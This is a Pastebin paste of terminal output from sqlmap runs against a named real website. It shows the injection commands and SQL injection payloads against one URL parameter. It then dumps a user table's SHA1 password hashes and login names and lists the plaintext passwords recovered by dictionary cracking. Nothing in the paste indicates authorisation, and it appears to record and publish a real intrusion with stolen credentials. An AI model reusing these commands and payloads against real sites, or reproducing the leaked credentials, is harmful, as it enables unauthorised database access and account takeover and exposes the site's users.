Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@cp-pUm4:/pentest/database/sqlmap# ./sqlmap.py -u http://www.brasil.org.bo/ml_age_cul2.php?id_ac=1 -D brasil2 -T Usuario -C usuClave --dump
- sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
- [*] starting at: 22:07:48
- [22:07:48] [INFO] using '/pentest/database/sqlmap/output/www.brasil.org.bo/session' as session file
- [22:07:48] [INFO] resuming injection data from session file
- [22:07:48] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
- [22:07:48] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id_ac
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_ac=1 AND 3352=3352
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id_ac=1 AND (SELECT 7137 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,99,102,58),(SELECT (CASE WHEN (7137=7137) THEN 1 ELSE 0 END)),CHAR(58,112,117,122,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 1 to 10 columns
- Payload: id_ac=-4498 UNION ALL SELECT CONCAT(CHAR(58,120,99,102,58),IFNULL(CAST(CHAR(121,101,108,76,79,67,115,75,74,108) AS CHAR),CHAR(32)),CHAR(58,112,117,122,58)), NULL, NULL, NULL, NULL, NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: id_ac=1 AND SLEEP(5)
- ---
- [22:07:49] [INFO] manual usage of GET payloads requires url encoding
- [22:07:49] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux CentOS 5
- web application technology: Apache 2.2.3, PHP 5.1.6
- back-end DBMS: MySQL 5.0
- do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] Y
- [22:07:55] [INFO] fetching columns LIKE 'usuClave' for table 'Usuario' on database 'brasil2'
- [22:07:55] [INFO] the SQL query used returns 1 entries
- [22:07:56] [INFO] retrieved: "usuClave","varchar(45)"
- [22:07:56] [INFO] fetching column(s) 'usuClave' entries for table 'Usuario' on database 'brasil2'
- [22:07:57] [INFO] the SQL query used returns 77 entries
- [22:07:57] [INFO] suppressing possible resume console info because of large number of rows (might take too much time)
- [22:07:57] [INFO] retrieved: "b2ffdbeb87e8e6331d350b482b328d309bc5a321"
- [22:07:58] [INFO] retrieved: "05d3ce712c27817b2bd914b5795519143e4c5f2f"
- [22:07:59] [INFO] retrieved: "a7b33e0a8c65debb4a90481c6e24fa86291d5e80"
- [22:07:59] [INFO] retrieved: "80f4744b624046be42b6077e8ba7316b316d0894"
- [22:08:00] [INFO] retrieved: "2acce934146755874cdcdda17b1f80b41b27d0f8"
- [22:08:00] [INFO] retrieved: "446b01869d5713dfb00e9e45b431c154292f2ec2"
- [22:08:01] [INFO] retrieved: " "
- [22:08:01] [INFO] retrieved: "8e374bd851a06ce1643ed1663168f00f8af0e461"
- [22:08:02] [INFO] retrieved: "1fb3381f4a67bfc2b7766213d411e29c8fca277c"
- [22:08:02] [INFO] retrieved: "6dfa9cecb562e345739f2e4eb69e9ebd0fbff687"
- [22:08:03] [INFO] retrieved: "2d8d596a0b97569f9226a8c33ed9c6dbc8d88120"
- [22:08:04] [INFO] retrieved: "c8c5e409fe246fd2af1025d4aeb63b11b18a7bdf"
- [22:08:04] [INFO] retrieved: "d7a9089bf3f52040cec8c19a2efbe72f11ae1cad"
- [22:08:05] [INFO] retrieved: "28a38c237f51b0e1bd5538da917a74611635302e"
- [22:08:05] [INFO] retrieved: "ef6b07855f2723256770c430aceb3eaac06d6299"
- [22:08:06] [INFO] retrieved: "f72faf30d4024ec3f0937f1db15e35ddf8709ddb"
- [22:08:06] [INFO] retrieved: "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3"
- [22:08:07] [INFO] retrieved: "58454b0abe9174f333fd6f1129c6d26b60f9b310"
- [22:08:08] [INFO] retrieved: "e4f88bf4b0c64b69a4393648335f5aa828e322fa"
- [22:08:08] [INFO] retrieved: "1315ae6229444367968a943a219f38def9a8112d"
- [22:08:09] [INFO] retrieved: " "
- [22:08:09] [INFO] retrieved: "58962726f7868e47fa3228f2b0c2714e53f0cf57"
- [22:08:10] [INFO] retrieved: "684eea1bd06123b2b2f0e722ae370c1853535208"
- [22:08:11] [INFO] retrieved: "3abc5e7d9da514c073e9f6469187092fe3863050"
- [22:08:11] [INFO] retrieved: "6954c2eea1e5bfbd2d28cb962e2648611a846aac"
- [22:08:12] [INFO] retrieved: "6954c2eea1e5bfbd2d28cb962e2648611a846aac"
- [22:08:12] [INFO] retrieved: "39dfa55283318d31afe5a3ff4a0e3253e2045e43"
- [22:08:13] [INFO] retrieved: "abe6729cf4a6bd2d81ef0bcdcbeb18c9f4396b8c"
- [22:08:14] [INFO] retrieved: "f9bfd018601fb96c95952d697b2d8ec058468649"
- [22:08:14] [INFO] retrieved: "64300e9f4a41aca4856f205bd3ac5dfa451b56e5"
- [22:08:15] [INFO] retrieved: "e4047b9d284ad4af044fee65e2545f89383b7588"
- [22:08:15] [INFO] retrieved: "c2efe46de2297a51be8b3abf1b6e91714fb2108d"
- [22:08:16] [INFO] retrieved: "52336104be246289fc8c4a76561d0b4fb825755a"
- [22:08:16] [INFO] retrieved: "ff02023dc6d922069eb605c673d0fc96db887687"
- [22:08:17] [INFO] retrieved: "f3e04d00715cbbf872c51d67c1527898723fd3a2"
- [22:08:17] [INFO] retrieved: "d1c3474da9e0eefa44582e1ca6dbc60be65a0f32"
- [22:08:19] [INFO] retrieved: "7110eda4d09e062aa5e4a390b0a572ac0d2c0220"
- [22:08:19] [INFO] retrieved: "b2ffdbeb87e8e6331d350b482b328d309bc5a321"
- [22:08:20] [INFO] retrieved: "977064207037ba4ce05824b829f77abcf7c0e196"
- [22:08:20] [INFO] retrieved: "7d24f63cc0bc4d1d37a4384c9cfc1575c1531f9a"
- [22:08:21] [INFO] retrieved: "9a6aa8b8b6919d3b97d0f40c9eda85f5523c7dd2"
- [22:08:22] [INFO] retrieved: "d1e0657c64f9506ce5943334e3afcdeace16e6e4"
- [22:08:22] [INFO] retrieved: "fdab1230c7beef1895081496cbed2fd4b66ac89a"
- [22:08:23] [INFO] retrieved: "ccf5d1afc4ea61dcfd0ab1dd4c2ac76a0f1d4b5b"
- [22:08:23] [INFO] retrieved: "a527f45c4d359ddc0a14b8fd7ba6d4b9e5a271c5"
- [22:08:24] [INFO] retrieved: "937bfaea6b875d17a48b0e4b499c346e56c4ca1c"
- [22:08:25] [INFO] retrieved: "e94f804cc70d3864a8b329ec1b9ed995ba83265a"
- [22:08:26] [INFO] retrieved: "7d46e8c50bed3489be816bcebdae8b50576d4f5a"
- [22:08:26] [INFO] retrieved: "e79cab55eab4c0a1a63610829a51fd51d5cfb294"
- [22:08:27] [INFO] retrieved: "ba46b93b2d133065a9b1a5288bbfbfd66ff46c6c"
- [22:08:28] [INFO] retrieved: "20fbb3a711536c098e559c95923751f3b5eea19e"
- [22:08:28] [INFO] retrieved: "3ddc24b54a6dd6d219e2647f6002f4a13417780d"
- [22:08:29] [INFO] retrieved: "ee4cadababffc267eca2c8e49c9b32fa0dae2c64"
- [22:08:30] [INFO] retrieved: "9d1e3c2635ffdace76b6dbce94675c4bbb747825"
- [22:08:31] [INFO] retrieved: "8b52b6b714585648fd300da0dbc0fa0678553280"
- [22:08:31] [INFO] retrieved: "ec337a44813c32dfd983cca0506395890b8213bb"
- [22:08:32] [INFO] retrieved: "2165c91bbc1a84a2c0dc189163f9d8b951d8cb3e"
- [22:08:32] [INFO] retrieved: "07e2c65734c5947da89571c512405bb3d72ab3ed"
- [22:08:33] [INFO] retrieved: "465e70c5dabfcc7e56c5006537c8682be945296c"
- [22:08:33] [INFO] retrieved: "fc6fea5b0c058716683a5ec0cf63833ba7a72bca"
- [22:08:34] [INFO] retrieved: "622ed1c03ff2cd169027503dc4835d7f3175f10e"
- [22:08:35] [INFO] retrieved: "9d12d9368b29612ff2f8ba55de78c4bf2ac03d8e"
- [22:08:35] [INFO] retrieved: "354cd6a96cc0a7013a18f69b52f937f484a661ad"
- [22:08:36] [INFO] retrieved: "32600d50b1abd85e1f2f9ddb141cb611d8e159d8"
- [22:08:36] [INFO] retrieved: "5462a3f5a6e49d750a5557cd3e89fd6862b56ad1"
- [22:08:37] [INFO] retrieved: "d7a9089bf3f52040cec8c19a2efbe72f11ae1cad"
- [22:08:37] [INFO] retrieved: "abf91baa2f6ce70c7a8d641e9f6eaa7076b6e21f"
- [22:08:38] [INFO] retrieved: "eb01d8f828a6c9a20be4534e72e049aaf41503df"
- [22:08:39] [INFO] retrieved: "4bf35f37a90e723b5f0a9024a7be0ec8a5176069"
- [22:08:39] [INFO] retrieved: "cbe5f67537f7a23de89e3cf559866386c6ece7a4"
- [22:08:40] [INFO] retrieved: "0d89e18e802e9054907596bf2c5a60db164d9a84"
- [22:08:40] [INFO] retrieved: "6d3bf83d679e76904d0672936bc24326f8e6bbb8"
- [22:08:41] [INFO] retrieved: "65959530c678d1d49e1a5d287ef32d32ec7e1288"
- [22:08:42] [INFO] retrieved: "e255b5f19aa5e14664a7f13d00662d521a3035e0"
- [22:08:42] [INFO] retrieved: "b5fcef502742dea91311c7f8b4f63518c8b9b624"
- [22:08:43] [INFO] retrieved: "5f58355136bb5e7f8fcc597feb42380ccd1ad286"
- [22:08:43] [INFO] retrieved: "722918b8856f7d7ff38fbcbccaf187fce8413e14"
- recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] Y
- [22:08:50] [INFO] using hash method: 'sha1_generic_passwd'
- what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
- [22:08:53] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
- do you want to use common password suffixes? (slow!) [y/N] N
- [22:08:58] [INFO] starting dictionary attack (sha1_generic_passwd)
- [22:08:58] [INFO] found: '0000' for hash: '39dfa55283318d31afe5a3ff4a0e3253e2045e43'
- [22:08:58] [INFO] found: '1234' for hash: '7110eda4d09e062aa5e4a390b0a572ac0d2c0220'
- [22:08:59] [INFO] found: '1956' for hash: '0d89e18e802e9054907596bf2c5a60db164d9a84'
- [22:09:02] [INFO] found: 'aida' for hash: 'ba46b93b2d133065a9b1a5288bbfbfd66ff46c6c'
- [22:09:03] [INFO] found: 'alfredo' for hash: 'a527f45c4d359ddc0a14b8fd7ba6d4b9e5a271c5'
- [22:09:03] [INFO] found: 'amos' for hash: 'eb01d8f828a6c9a20be4534e72e049aaf41503df'
- [22:09:03] [INFO] found: 'andreia' for hash: 'c2efe46de2297a51be8b3abf1b6e91714fb2108d'
- [22:09:06] [INFO] found: 'brasil' for hash: 'e4f88bf4b0c64b69a4393648335f5aa828e322fa'
- [22:09:07] [INFO] found: 'cae' for hash: '9d12d9368b29612ff2f8ba55de78c4bf2ac03d8e'
- [22:09:07] [INFO] found: 'caff' for hash: '684eea1bd06123b2b2f0e722ae370c1853535208'
- [22:09:07] [INFO] found: 'carlito' for hash: 'e4047b9d284ad4af044fee65e2545f89383b7588'
- [22:09:07] [INFO] found: 'celso' for hash: 'd1e0657c64f9506ce5943334e3afcdeace16e6e4'
- [22:09:09] [INFO] found: 'costa' for hash: '4bf35f37a90e723b5f0a9024a7be0ec8a5176069'
- [22:09:09] [INFO] found: 'cultural' for hash: '5f58355136bb5e7f8fcc597feb42380ccd1ad286'
- [22:09:13] [INFO] found: 'francis' for hash: '1fb3381f4a67bfc2b7766213d411e29c8fca277c'
- [22:09:13] [INFO] found: 'francisco' for hash: '1315ae6229444367968a943a219f38def9a8112d'
- [22:09:13] [INFO] found: 'giovana' for hash: '5462a3f5a6e49d750a5557cd3e89fd6862b56ad1'
- [22:09:17] [INFO] found: 'julio' for hash: '52336104be246289fc8c4a76561d0b4fb825755a'
- [22:09:20] [INFO] found: 'luci' for hash: 'a7b33e0a8c65debb4a90481c6e24fa86291d5e80'
- [22:09:20] [INFO] found: 'lucia' for hash: 'f9bfd018601fb96c95952d697b2d8ec058468649'
- [22:09:20] [INFO] found: 'luciene' for hash: '58454b0abe9174f333fd6f1129c6d26b60f9b310'
- [22:09:20] [INFO] found: 'magda' for hash: '9d1e3c2635ffdace76b6dbce94675c4bbb747825'
- [22:09:21] [INFO] found: 'manolito' for hash: '65959530c678d1d49e1a5d287ef32d32ec7e1288'
- [22:09:22] [INFO] found: 'moises' for hash: 'abe6729cf4a6bd2d81ef0bcdcbeb18c9f4396b8c'
- [22:09:23] [INFO] found: 'octavio' for hash: '7d24f63cc0bc4d1d37a4384c9cfc1575c1531f9a'
- [22:09:23] [INFO] found: 'olga' for hash: 'd7a9089bf3f52040cec8c19a2efbe72f11ae1cad'
- [22:09:24] [INFO] found: 'padova' for hash: 'f3e04d00715cbbf872c51d67c1527898723fd3a2'
- [22:09:25] [INFO] found: 'rafael' for hash: '2d8d596a0b97569f9226a8c33ed9c6dbc8d88120'
- [22:09:26] [INFO] found: 'raul' for hash: '8b52b6b714585648fd300da0dbc0fa0678553280'
- [22:09:26] [INFO] found: 'rodrigo' for hash: '6dfa9cecb562e345739f2e4eb69e9ebd0fbff687'
- [22:09:26] [INFO] found: 'rojas' for hash: 'fc6fea5b0c058716683a5ec0cf63833ba7a72bca'
- [22:09:26] [INFO] found: 'rosana' for hash: 'cbe5f67537f7a23de89e3cf559866386c6ece7a4'
- [22:09:27] [INFO] found: 'ruy' for hash: 'c8c5e409fe246fd2af1025d4aeb63b11b18a7bdf'
- [22:09:27] [INFO] found: 'santos' for hash: '937bfaea6b875d17a48b0e4b499c346e56c4ca1c'
- [22:09:28] [INFO] found: 'souza' for hash: 'f72faf30d4024ec3f0937f1db15e35ddf8709ddb'
- [22:09:29] [INFO] found: 'test' for hash: 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3'
- [22:09:30] [INFO] found: 'vicky' for hash: 'e79cab55eab4c0a1a63610829a51fd51d5cfb294'
- [22:09:31] [INFO] found: 'wilson' for hash: 'b2ffdbeb87e8e6331d350b482b328d309bc5a321'
- [22:09:31] [INFO] found: 'wolfgang' for hash: 'ec337a44813c32dfd983cca0506395890b8213bb'
- Database: brasil2
- Table: Usuario
- [73 entries]
- +------------------------------------------------------+
- | usuClave |
- +------------------------------------------------------+
- | 2acce934146755874cdcdda17b1f80b41b27d0f8 |
- | 58454b0abe9174f333fd6f1129c6d26b60f9b310 (luciene) |
- | 446b01869d5713dfb00e9e45b431c154292f2ec2 |
- | 1315ae6229444367968a943a219f38def9a8112d (francisco) |
- | 52336104be246289fc8c4a76561d0b4fb825755a (julio) |
- | e79cab55eab4c0a1a63610829a51fd51d5cfb294 (vicky) |
- | cbe5f67537f7a23de89e3cf559866386c6ece7a4 (rosana) |
- | ee4cadababffc267eca2c8e49c9b32fa0dae2c64 |
- | 684eea1bd06123b2b2f0e722ae370c1853535208 (caff) |
- | 9d12d9368b29612ff2f8ba55de78c4bf2ac03d8e (cae) |
- | f9bfd018601fb96c95952d697b2d8ec058468649 (lucia) |
- | f3e04d00715cbbf872c51d67c1527898723fd3a2 (padova) |
- | 8b52b6b714585648fd300da0dbc0fa0678553280 (raul) |
- | e4f88bf4b0c64b69a4393648335f5aa828e322fa (brasil) |
- | 6d3bf83d679e76904d0672936bc24326f8e6bbb8 |
- | 05d3ce712c27817b2bd914b5795519143e4c5f2f |
- | b2ffdbeb87e8e6331d350b482b328d309bc5a321 (wilson) |
- | 28a38c237f51b0e1bd5538da917a74611635302e |
- | ccf5d1afc4ea61dcfd0ab1dd4c2ac76a0f1d4b5b |
- | 5462a3f5a6e49d750a5557cd3e89fd6862b56ad1 (giovana) |
- | eb01d8f828a6c9a20be4534e72e049aaf41503df (amos) |
- | 977064207037ba4ce05824b829f77abcf7c0e196 |
- | NULL |
- | 6dfa9cecb562e345739f2e4eb69e9ebd0fbff687 (rodrigo) |
- | 07e2c65734c5947da89571c512405bb3d72ab3ed |
- | e94f804cc70d3864a8b329ec1b9ed995ba83265a |
- | abe6729cf4a6bd2d81ef0bcdcbeb18c9f4396b8c (moises) |
- | 465e70c5dabfcc7e56c5006537c8682be945296c |
- | e255b5f19aa5e14664a7f13d00662d521a3035e0 |
- | 9d1e3c2635ffdace76b6dbce94675c4bbb747825 (magda) |
- | 7d46e8c50bed3489be816bcebdae8b50576d4f5a |
- | 7d24f63cc0bc4d1d37a4384c9cfc1575c1531f9a (octavio) |
- | ec337a44813c32dfd983cca0506395890b8213bb (wolfgang) |
- | 937bfaea6b875d17a48b0e4b499c346e56c4ca1c (santos) |
- | 4bf35f37a90e723b5f0a9024a7be0ec8a5176069 (costa) |
- | 3ddc24b54a6dd6d219e2647f6002f4a13417780d |
- | d7a9089bf3f52040cec8c19a2efbe72f11ae1cad (olga) |
- | fdab1230c7beef1895081496cbed2fd4b66ac89a |
- | f72faf30d4024ec3f0937f1db15e35ddf8709ddb (souza) |
- | 39dfa55283318d31afe5a3ff4a0e3253e2045e43 (0000) |
- | 354cd6a96cc0a7013a18f69b52f937f484a661ad |
- | e4047b9d284ad4af044fee65e2545f89383b7588 (carlito) |
- | abf91baa2f6ce70c7a8d641e9f6eaa7076b6e21f |
- | ba46b93b2d133065a9b1a5288bbfbfd66ff46c6c (aida) |
- | 65959530c678d1d49e1a5d287ef32d32ec7e1288 (manolito) |
- | 6954c2eea1e5bfbd2d28cb962e2648611a846aac |
- | 5f58355136bb5e7f8fcc597feb42380ccd1ad286 (cultural) |
- | 3abc5e7d9da514c073e9f6469187092fe3863050 |
- | ff02023dc6d922069eb605c673d0fc96db887687 |
- | 0d89e18e802e9054907596bf2c5a60db164d9a84 (1956) |
- | 2165c91bbc1a84a2c0dc189163f9d8b951d8cb3e |
- | 20fbb3a711536c098e559c95923751f3b5eea19e |
- | a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 (test) |
- | 7110eda4d09e062aa5e4a390b0a572ac0d2c0220 (1234) |
- | 8e374bd851a06ce1643ed1663168f00f8af0e461 |
- | 80f4744b624046be42b6077e8ba7316b316d0894 |
- | d1e0657c64f9506ce5943334e3afcdeace16e6e4 (celso) |
- | a527f45c4d359ddc0a14b8fd7ba6d4b9e5a271c5 (alfredo) |
- | 622ed1c03ff2cd169027503dc4835d7f3175f10e |
- | 2d8d596a0b97569f9226a8c33ed9c6dbc8d88120 (rafael) |
- | d1c3474da9e0eefa44582e1ca6dbc60be65a0f32 |
- | a7b33e0a8c65debb4a90481c6e24fa86291d5e80 (luci) |
- | b5fcef502742dea91311c7f8b4f63518c8b9b624 |
- | fc6fea5b0c058716683a5ec0cf63833ba7a72bca (rojas) |
- | 64300e9f4a41aca4856f205bd3ac5dfa451b56e5 |
- | ef6b07855f2723256770c430aceb3eaac06d6299 |
- | 58962726f7868e47fa3228f2b0c2714e53f0cf57 |
- | 9a6aa8b8b6919d3b97d0f40c9eda85f5523c7dd2 |
- | 1fb3381f4a67bfc2b7766213d411e29c8fca277c (francis) |
- | c8c5e409fe246fd2af1025d4aeb63b11b18a7bdf (ruy) |
- | 32600d50b1abd85e1f2f9ddb141cb611d8e159d8 |
- | 722918b8856f7d7ff38fbcbccaf187fce8413e14 |
- | c2efe46de2297a51be8b3abf1b6e91714fb2108d (andreia) |
- +------------------------------------------------------+
- [22:09:32] [INFO] Table 'brasil2.Usuario' dumped to CSV file '/pentest/database/sqlmap/output/www.brasil.org.bo/dump/brasil2/Usuario.csv'
- [22:09:32] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.brasil.org.bo'
- [*] shutting down at: 22:09:32
- root@cp-pUm4:/pentest/database/sqlmap# ./sqlmap.py -u http://www.brasil.org.bo/ml_age_cul2.php?id_ac=1 -D brasil2 -T Usuario -C usuNombre --dump
- sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
- [*] starting at: 22:12:43
- [22:12:43] [INFO] using '/pentest/database/sqlmap/output/www.brasil.org.bo/session' as session file
- [22:12:43] [INFO] resuming injection data from session file
- [22:12:43] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
- [22:12:43] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id_ac
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_ac=1 AND 3352=3352
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id_ac=1 AND (SELECT 7137 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,99,102,58),(SELECT (CASE WHEN (7137=7137) THEN 1 ELSE 0 END)),CHAR(58,112,117,122,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 1 to 10 columns
- Payload: id_ac=-4498 UNION ALL SELECT CONCAT(CHAR(58,120,99,102,58),IFNULL(CAST(CHAR(121,101,108,76,79,67,115,75,74,108) AS CHAR),CHAR(32)),CHAR(58,112,117,122,58)), NULL, NULL, NULL, NULL, NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: id_ac=1 AND SLEEP(5)
- ---
- [22:12:44] [INFO] manual usage of GET payloads requires url encoding
- [22:12:44] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux CentOS 5
- web application technology: Apache 2.2.3, PHP 5.1.6
- back-end DBMS: MySQL 5.0
- do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n]
- [22:12:51] [INFO] fetching columns LIKE 'usuNombre' for table 'Usuario' on database 'brasil2'
- [22:12:51] [INFO] the SQL query used returns 1 entries
- [22:12:52] [INFO] retrieved: "usuNombre","varchar(100)"
- [22:12:52] [INFO] fetching column(s) 'usuNombre' entries for table 'Usuario' on database 'brasil2'
- [22:12:52] [INFO] read from file '/pentest/database/sqlmap/output/www.brasil.org.bo/session': 77
- [22:12:52] [INFO] the SQL query used returns 77 entries
- [22:12:52] [INFO] suppressing possible resume console info because of large number of rows (might take too much time)
- [22:12:53] [INFO] retrieved: "zoila"
- [22:12:53] [INFO] retrieved: "wilson"
- [22:12:53] [INFO] retrieved: "vivi"
- [22:12:54] [INFO] retrieved: "virginia"
- [22:12:54] [INFO] retrieved: "vicky"
- [22:12:55] [INFO] retrieved: "trinidad"
- [22:12:55] [INFO] retrieved: "toiney"
- [22:12:56] [INFO] retrieved: "test"
- [22:12:56] [INFO] retrieved: "silvia"
- [22:12:57] [INFO] retrieved: "silva"
- [22:12:57] [INFO] retrieved: "selma"
- [22:12:57] [INFO] retrieved: "sandrab"
- [22:12:58] [INFO] retrieved: "sandra"
- [22:12:58] [INFO] retrieved: "ruy"
- [22:12:59] [INFO] retrieved: "ruddy"
- [22:12:59] [INFO] retrieved: "rosana"
- [22:13:00] [INFO] retrieved: "Roldao"
- [22:13:00] [INFO] retrieved: "rodrigo"
- [22:13:01] [INFO] retrieved: "rita"
- [22:13:01] [INFO] retrieved: "raul"
- [22:13:02] [INFO] retrieved: "ramon"
- [22:13:02] [INFO] retrieved: "rafael"
- [22:13:03] [INFO] retrieved: "pedromaciel"
- [22:13:03] [INFO] retrieved: "paulo"
- [22:13:04] [INFO] retrieved: "patricia"
- [22:13:04] [INFO] retrieved: "osilva"
- [22:13:05] [INFO] retrieved: "omar"
- [22:13:05] [INFO] retrieved: "olga"
- [22:13:05] [INFO] retrieved: "octavio"
- [22:13:06] [INFO] retrieved: "NOVO REGISTRO"
- [22:13:06] [INFO] retrieved: "murilo"
- [22:13:07] [INFO] retrieved: "moises"
- [22:13:11] [INFO] retrieved: "miguel"
- [22:13:11] [INFO] retrieved: "mery"
- [22:13:12] [INFO] retrieved: "mauricio"
- [22:13:12] [INFO] retrieved: "mario"
- [22:13:13] [INFO] retrieved: "marcoantonio"
- [22:13:13] [INFO] retrieved: "marcia"
- [22:13:13] [INFO] retrieved: "magda"
- [22:13:14] [INFO] retrieved: "luisalberto"
- [22:13:14] [INFO] retrieved: "luciav"
- [22:13:15] [INFO] retrieved: "lucia"
- [22:13:15] [INFO] retrieved: "lmaman"
- [22:13:16] [INFO] retrieved: "lina"
- [22:13:16] [INFO] retrieved: "lhybar"
- [22:13:17] [INFO] retrieved: "julio"
- [22:13:17] [INFO] retrieved: "juanlucio"
- [22:13:18] [INFO] retrieved: "juaneduardo"
- [22:13:18] [INFO] retrieved: "jroberto"
- [22:13:18] [INFO] retrieved: "josemarcos"
- [22:13:19] [INFO] retrieved: "joaquim"
- [22:13:19] [INFO] retrieved: "javierz"
- [22:13:20] [INFO] retrieved: "jandre"
- [22:13:20] [INFO] retrieved: "jandiara"
- [22:13:21] [INFO] retrieved: "gonzalo"
- [22:13:21] [INFO] retrieved: "gjordan"
- [22:13:22] [INFO] retrieved: "giovana"
- [22:13:22] [INFO] retrieved: "evandro"
- [22:13:23] [INFO] retrieved: "eumar"
- [22:13:23] [INFO] retrieved: "eloi"
- [22:13:23] [INFO] retrieved: "corina"
- [22:13:24] [INFO] retrieved: "Contagem de Estoque"
- [22:13:24] [INFO] retrieved: "claudia"
- [22:13:25] [INFO] retrieved: "chossi"
- [22:13:25] [INFO] retrieved: "celso"
- [22:13:26] [INFO] retrieved: "carlos alberto"
- [22:13:26] [INFO] retrieved: "carlos"
- [22:13:27] [INFO] retrieved: "carlito"
- [22:13:27] [INFO] retrieved: "carla"
- [22:13:27] [INFO] retrieved: "beymar"
- [22:13:28] [INFO] retrieved: "azucena"
- [22:13:28] [INFO] retrieved: "aurelio"
- [22:13:29] [INFO] retrieved: "andreia"
- [22:13:29] [INFO] retrieved: "anamaria"
- [22:13:30] [INFO] retrieved: "alfredo"
- [22:13:30] [INFO] retrieved: "Administra\xe7\xe0o"
- [22:13:31] [INFO] retrieved: ""
- Database: brasil2
- Table: Usuario
- [77 entries]
- +---------------------+
- | usuNombre |
- +---------------------+
- | julio |
- | mery |
- | evandro |
- | alfredo |
- | juanlucio |
- | azucena |
- | rosana |
- | javierz |
- | carlito |
- | carla |
- | rodrigo |
- | josemarcos |
- | trinidad |
- | jandiara |
- | giovana |
- | wilson |
- | jroberto |
- | marcia |
- | silvia |
- | celso |
- | jandre |
- | patricia |
- | luciav |
- | eumar |
- | paulo |
- | joaquim |
- | juaneduardo |
- | carlos alberto |
- | magda |
- | beymar |
- | test |
- | NOVO REGISTRO |
- | eloi |
- | osilva |
- | gonzalo |
- | rita |
- | omar |
- | murilo |
- | gjordan |
- | mauricio |
- | pedromaciel |
- | anamaria |
- | claudia |
- | selma |
- | silva |
- | ramon |
- | virginia |
- | mario |
- | zoila |
- | ruy |
- | luisalberto |
- | sandrab |
- | sandra |
- | raul |
- | andreia |
- | moises |
- | lucia |
- | lina |
- | toiney |
- | Contagem de Estoque |
- | vivi |
- | olga |
- | chossi |
- | lhybar |
- | lmaman |
- | aurelio |
- | miguel |
- | ruddy |
- | marcoantonio |
- | corina |
- | Administra\xe7\xe0o |
- | vicky |
- | octavio |
- | rafael |
- | carlos |
- | Roldao |
- |
- +---------------------+
- [22:13:31] [INFO] Table 'brasil2.Usuario' dumped to CSV file '/pentest/database/sqlmap/output/www.brasil.org.bo/dump/brasil2/Usuario.csv'
- [22:13:31] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.brasil.org.bo'
- [*] shutting down at: 22:13:31
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement